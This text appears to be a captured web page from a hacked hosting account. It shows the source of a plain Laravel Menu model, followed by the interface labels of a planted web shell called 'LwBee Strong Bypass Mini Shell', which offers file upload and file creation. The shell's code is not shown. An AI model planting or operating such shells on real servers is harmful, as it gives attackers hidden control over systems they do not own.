/home/storage/f/3f/a5/aloic1/public_html/core/app/Models/Menu.php
<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;

class Menu extends Model
{
    use HasFactory;

    public function subMenus()
    {
        return $this->hasMany('App\Models\Menu', 'father_id')->orderby('row_no', 'asc');
    }

    public function webmasterSection()
    {
        return $this->belongsTo('App\Models\WebmasterSection', 'cat_id');
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File